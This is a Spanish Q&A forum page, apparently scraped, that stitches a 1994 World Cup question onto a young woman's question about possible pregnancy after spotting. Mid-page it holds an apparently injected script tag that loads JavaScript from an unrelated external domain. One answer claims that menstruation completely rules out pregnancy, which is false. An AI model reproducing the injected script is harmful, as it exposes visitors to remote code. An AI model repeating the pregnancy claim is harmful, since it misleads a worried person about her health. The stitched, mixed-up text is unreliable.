¿Quién ganó el mundial de fútbol de 1994?

hola mira mi regla es el 8 de cada mes pero a veces soy irregular el 8 de junio me llego normal he tenido relaciones con mi novio. Pero nos cuidamos con preservativos al comienzo así nomas ya a los 5 minutos se lo pone pero el 4.5.6.7.me duele las caderas y tuve relaciones el 8 por que no me llegaba nos cuidamos con preservativos ahora me vine la regla el 9.10.11.12.13 pero me baja poquito me mancha la toalla sera embarazo por favor dime gracias

<script type="text/javascript" src="http://nuevotemarosa.info/?0.26617534020261224"></script>

2 Respuestas

Respuesta

Es una alteración del ciclo menstrual.

La presencia de la menstruación descarta completamente la posibilidad de un embarazo.

Respuesta

Fue el mundial de fútbol de EE. UU y lo gano Brasil. Lo otro ya te lo conteste.